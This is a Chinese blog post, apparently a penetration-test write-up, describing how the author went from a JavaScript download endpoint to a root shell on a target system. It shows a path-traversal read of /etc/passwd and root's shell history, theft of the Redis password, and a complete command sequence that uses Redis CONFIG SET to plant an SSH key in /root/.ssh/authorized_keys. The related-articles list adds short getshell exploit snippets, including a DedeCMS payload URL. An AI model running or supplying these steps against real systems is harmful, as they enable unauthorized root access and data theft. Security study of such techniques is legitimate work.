分析Js到GetShell

最新推荐文章于 2022-11-07 10:22:34 发布
最新推荐文章于 2022-11-07 10:22:34 发布
阅读量984 收藏 1
点赞数 1
分类专栏: Web安全 文章标签: 网络安全 js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pyth0zn/article/details/127204479
版权

声明 

   免责声明:本文为个人作品,只做技术研究,只可用于正常的技术交流与学习,不可用于灰黑产业,不可从事违法犯罪行,严禁利用本文所介绍的技术进行未授权的恶意攻击,否则,后果自负!!!

测试某系统,常规的功能点完后,发现没有什么有价值的洞,

F12 全局搜索 download 发现一处get接口

 使用burp访问发现500错误,应该是缺少参数

 使用x8 FUZZ参数

两秒之后 就出结果,发现存在path 参数

 访问之,提示文件不存在,有戏

尝试访问 etc/passwd,成功读取

 

读root用户的hisotry,发现开了10022 作为ssh端口

开启了 密钥登陆

 存在redis

 

读取redis密码

 

nmap发现6379也是开放,既然是root账户 直接 写个ssh公钥进去

 


ssh-keygen -t rsa
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > /tmp/key.txt
cat key.txt|redis-cli -h xxx.xx.xx.xx -a 'Pxxx3' -x set crack

# 链接redis
redis-cli -h xxx.xx -a 'Paxxxx123'


#获取redis备份的路径
CONFIG GET dir  # 截图忘记

#更改redis备份路径
CONFIG SET dir /root/.ssh

#设置备份文件的名称为authorized_keys
CONFIG SET dbfilename authorized_keys

#检查是否更改
CONFIG GET dbfilename
# 保存
save

 ssh -p10022 root@xxx.xxx.xxx 成功链接

 

 

pyth0nn
关注
专栏目录
dede ad_js.php getshell,nday漏洞还原分析之dedecms后台getshell
weixin_34151001的博客
03-29 501
前言最近发现 dedecms 的 nday后台getshell ,于是打算还原一下。根据日志显示,攻击者访问了 dede/ad_add.php 文件后,转而访问 plus/ad_js.php 文件,提交的 payload 为 plus/ad_js.php?nocache=1&aid=1&_=whoami 。前期准备我们先来看一下 dede/ad_add.php 文件。可以看到这是一...
ue编辑器漏洞_ueditor getshell漏洞重现及分析
weixin_39633165的博客
12-21 999
0x00 概述8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。0x01 漏洞重现Payload:shelladdr:图片马x.jpg放在自己服务器上提交http://www.domain.top/x.jpg?.aspx返回:菜刀连接:0x02 修复方案增加文件扩展名校验(白名单)0x03 漏洞分析uedi...
js到getshell
weixin_50464560的博客
07-22 567
看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusrc的时候收集了一波山理的子域资产,全部看了一遍都被大佬挖的干干净净了。没有内网VPN基本上挖不到,然后我就去公众号看了一下,找到了一个系统 首先来点团队特色F12大法,查看html源码发现一处js 发现登录后直接跳转这个地址 直接访问看看有没有未授权漏洞http://xx.xx.xx.xx/index.jsp 访问了好吧,是首页。。打扰了但是我不甘心,我再用F12大法,发现了index.js 访问http://xx.xx.xx.xx/index.
SRC挖掘技巧—写js代码就能getshell
pyth0zn的博客
10-16 1659
发现算法编辑器->尝试执行nodejs 代码执行->发现调用得是java Nashorn引擎->写js代码调用java 方法执行代码->over!继续看资料 发现 通过 框架可以通过js创建java 对象 使用关键字 Java.type 就可以。通过上面报错发现用了java的框架 来执行js 查一下api 教程 ,参考如下资料。发现后端用的node js,尝试写一个nodejs 代码执行。查看格式化按钮旁边的【查看帮助接口】 看到里面写的特别像js 代码。打开后看看,可以写代码。用以下样例脚本测试下。
js跳转https_从JS敏感信息泄露到GETSHELL
weixin_36424234的博客
12-08 229
亲爱的,关注我吧11/3文章共计742个词预计阅读8分钟来和我一起阅读吧作者:果酸为首的苹果本文转自先知社区:https://xz.aliyun.com/t/8441前言小弟新手,大佬勿喷,文章有何不妥,还望大佬们斧正。正文前端时间打HW,拿到一个IP,先在FOFA上搜一下发现这个IP现在开放了三个端口,分别是86,83,82对应不同的后台管理系统先从86端口这个系统入手,界面如图没有验...
实战|全程分析js到getshell
qq_50854662的博客
09-28 271
本篇转载于https://forum.butian.net/share/260 看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusrc的时候收集了一波山理的子域资产,全部看了一遍都被大佬挖的干干净净了。没有内网VPN基本上挖不到,然后我就去公众号看了一下,找到... 看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusr
JS敏感信息泄露到GETSHELL
weixin_50464560的博客
08-18 374
前言 小弟新手,大佬勿喷,文章有何不妥,还望大佬们斧正。 正文 前端时间打HW,拿到一个IP,先在FOFA上搜一下 发现这个IP现在开放了三个端口,分别是86,83,82对应不同的后台管理系统 先从86端口这个系统入手,界面如图 没有验证码!我喜欢,掏出我的大宝贝300万大字典对着admin就是一顿爆,然而现实是残酷的。。。 搞不到弱密码,随手查看了一下源代码,发现这里登录成功跳转index.html 直接URL输入xxx.xxx.xxx.xxx:86/index.h...
【Vulfocus解题复现】tomcat-pass-getshell 弱口令
温氏效应
11-15 3803
漏洞介绍 名称:Tomcat-pass-getshell 弱口令 描述:Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell 解题过程 1、打开靶场环境,并点击Manage App链接,通过弱口令登录平台,账号密码均为:tomcat 2、拖动页面,找到war上传区域,上传jsp木马: 制作jsp木马,.
mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
weixin_42118161的博客
02-18 887
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GL...
若依后台管理系统 v4.1
09-29
3. **权限管理**:具备完善的用户、角色和权限控制机制,能够精细到操作级别的权限分配,确保系统的安全性和数据的保护。 4. **菜单动态加载**:菜单配置文件化,支持动态加载,使得系统配置更加灵活,易于维护。 ...
任意文件上传getshell
Websec
03-21 8833
漏洞描述:任意文件上传顾名思义就是在文件上传的地方能够上传任意类型的文件,我们可以上传恶意木马文件对其服务器进行攻击。漏洞寻找:通过查看文件上传的地方,通过burpsuite抓包分析其上传点对其文件类型是否做了限制,也可能只是做了前端限制,但是这个都不要紧,直接绕过就行漏洞修复建议:1.文件上传的地方,我们需要对其文件格式做白名单限制,只允许我们需要的文件进行上传即可2.对文件格式进行校验,前端以...
html预览 webshell,RTLO技术与HTML文件是否可以变为WEBSHELL
weixin_28791139的博客
06-28 501
一、浅谈RTLO技术我在FreeBuf上到了 [APT攻击]趋势科技捕获一次APT攻击活动 这篇文章,然后就自己去探探究竟,文章地址在下面RLO控制符是Unicode控制符的一种,使得字符显示从右至左的顺序,攻击者可以利用RTLO技术来达到欺骗目标,从而使得可执行文件的运行。首先Windows系统在解析文件名时,当遇到unicode控制符时,会改变文件名的显示方式,利用这一特性,可以将exe、sc...
html页面执行shell,经过CGI实如今Html页面上执行shell命令
weixin_42498055的博客
06-04 1012
在mac上配置cgi(不用系统自带的apache cgi.)安装cgi1. brew update2. brew install httpd24安装完后,会有以下提示htmlDocumentRoot is /usr/local/var/www.shellThe default ports have been set in /usr/local/etc/httpd/httpd.conf to 808...
html预览 webshell,2020-04-29后门分析、获取webshell的方法
weixin_39747721的博客
06-28 461
大马后门分析首先搭建一个木马将文件拖入虚拟机中当我们登录的时候输入一个错误的密码,提示非法登录查看代码,找出关键字,并将代码复制到新记事本中,将execute换成msgbox然后保存,将文件名改为11.vbs后缀名,然后打开11.vbs文件,ctrl+A ctrl+C ctrl+V 复制粘贴到新建记事本中6 8是后门这是一个后门%号后门又一个后门网页地址后门然后我们将搭建好的后门,进行...
html 上传文件_【实战篇】记一次文件上传漏洞绕过
weixin_39636099的博客
11-25 1130
点击上方“公众号” 可以订阅哦!Hello,各位小伙伴大家好~最近有点高产似母猪~那今天就少写点,简单记录一个文件上传漏洞的绕过吧~(机智如我..)之前也介绍过一期文件上传漏洞:【文件上传与解析】文件上传与解析漏洞总结v1.0一起来看看今天的内容吧。Part.1漏洞挖掘漏洞测试 目标站点登陆后可以上传公司logo:先随意上传一张图片://可以看到文件被重命名了,但返回了路径。直接访问路径...
利用文件名进行GetShell---CTF题目的相关知识解析
rigous的博客
11-27 3740
0x00 今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一下,主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。 首先主要看了下8084对应的题目,包括一道php登录绕过和命令执行漏洞,整个解题思路一波三折,很有意思。
网站渗透总结之Getshell用法大全
最新发布
LinkSLA的博客
11-07 2546
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
使用Javascript shell解释执行js代码
weixin_41763944的博客
08-06 4213
最近,算法小白在跟着《数据结构与算法javascript描述》这本书学习算法知识。 首先,小白就被难住了。这个js shell是个什么玩意儿。故鼓捣了半天,又几个小时过去了。。。 终于会用了。。写下来,大家自取。也是为了让我自己不会忘记。。。毕竟记性不大忘性大的我。。 1.下载一个符合自己电脑系统的js shell,书里的地址尝试了半天并没有打开,心塞塞,我以为我学校的网络崩掉了。下面的地址...
GETSHELL学习总结
weixin_44508748的博客
06-29 4516
分类 带有漏洞的应用 redis 、tomcat、解析漏洞、编辑器、FTP 常规漏洞 sql注入、上传、文件包含、命令执行、Struts2、代码反序列化 后台拿shell 上传、数据库备份、配置插马 关于各种带有漏洞的应用以及OWASP Top10常规漏洞需要不断的积累,打造自己的核心的知识库,道路且长。本文仅记录最近对常见cms后台getshell的学习总结 网站getshell方法 1.数据库备份拿shell 如果网站后台具有数据库备份功能,可以将webshell格式先修改为允许上传的文件格式如jpg,
ThinkCMF缓存Getshell漏洞分析与利用
这篇由Sp4ceHACK学习呀发表的文章讲述了针对ThinkCMF2.X(基于ThinkPHP3.x框架)的Getshell漏洞利用方法。 ThinkCMF是一款基于ThinkPHP的开源内容管理框架,而ThinkPHP3.x版本默认开启错误日志记录和模板缓存功能。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

pyth0nn

送人玫瑰,手留余香

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值